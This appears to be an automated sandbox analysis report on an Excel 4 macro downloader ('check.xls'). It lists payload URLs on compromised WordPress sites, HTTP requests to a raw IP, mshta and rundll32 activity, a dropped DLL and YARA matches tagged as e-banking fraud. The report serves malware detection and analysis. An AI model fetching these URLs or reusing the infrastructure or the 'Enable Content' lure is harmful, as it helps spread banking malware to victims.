Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://umanostudio.com/wp-admin
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weddingbandsirelandjbk.c
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weddingbandsirelandjbk.com/hgsynt2/o/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weddingbandsirelandjbk.com/hgsynt2/o/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.yeald.finance
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.yeald.finance/wp-adm
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.yeald.finance/wp-admin/1WgPRm/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.yeald.finance/wp-admin/1WgPRm/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: www.yeald.finance
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /wp-admin/1WgPRm/ HTTP/1.1Host: www.yeald.financeConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zzx/ccv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zzx/ccv/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: mshta.exe, 00000004.00000003.402324314.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.421421637.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comK equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.402324314.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.421421637.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: powershell.exe, 00000006.00000002.659537368.000000000048E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud

barindex
Source: Yara match File source: 12.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2840000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.5c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.a50000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.30e0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2f10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2f90000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.23d0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.900000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2920000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.7e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3060000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.960000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.8e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.a10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d10000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.5c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2680000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.23d0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ab0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ab0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.a10000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2770000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.8d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2880000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2850000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3130000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f70000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3080000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.bf0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3030000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2840000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.9c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2770000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2850000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3060000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.8b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.23d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.890000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.880000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2c60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2460000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2f90000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d10000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d90000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.25a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.26e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.8e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2880000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2750000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.880000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2750000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2b30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.a90000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.360000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3080000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.930000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.9c0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.930000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.810000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.23d0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2530000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2b30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.9c0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2680000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.660050633.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551254560.00000000026E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513222322.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512899048.0000000000A41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594132166.0000000000901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512928569.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551495876.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551115923.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660299054.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.428970111.0000000000590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551161049.0000000000A51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659831488.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512996042.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475400290.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475156348.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660327240.0000000002D91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474851812.0000000000690000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512498870.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.593877639.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513150958.0000000003080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659758879.0000000000961000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551542350.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660266694.0000000002C61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594377793.0000000002880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594111922.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.477681405.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.597604576.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.553407188.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475233428.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.477468433.0000000000811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.553477687.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513084856.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513119737.0000000002F11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551016676.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551292521.0000000002750000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594180055.00000000009C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594421745.00000000028B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512955437.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474984528.0000000002680000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.596897580.0000000000130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475306327.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515660080.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659477991.0000000000361000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594540165.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475077072.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551587623.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594153605.0000000000930000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474880932.00000000007B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660127341.0000000002840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551064488.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475179519.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659519643.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594076623.0000000000891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660086465.0000000002461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512644490.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659432268.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474916407.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475367351.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.550663447.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475133854.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.662795416.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.597182512.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660160297.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.658914705.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513030492.0000000002531000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475267140.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.660227992.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594635198.00000000030E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475043970.0000000002770000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475004428.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.550603107.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594481069.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551207015.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551387065.0000000002850000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515365273.0000000000290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515468825.00000000006F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.553700748.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551322248.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.429058076.0000000001F71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.477225934.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.593923730.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594575357.0000000003060000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.551422656.0000000002921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512441171.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.594724619.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512674317.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.593897086.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.513180019.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659987477.0000000000A91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512601527.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.659040226.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475202470.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.474954492.00000000025A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.429100383.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\Documents\ssd.dll, type: DROPPED

System Summary

barindex
Source: check.xls Macro extractor: Sheet: Macro1 contains: mshta
Source: check.xls Macro extractor: Sheet: Macro1 contains: mshta
Source: check.xls, type: SAMPLE Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\check.xls, type: DROPPED Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23
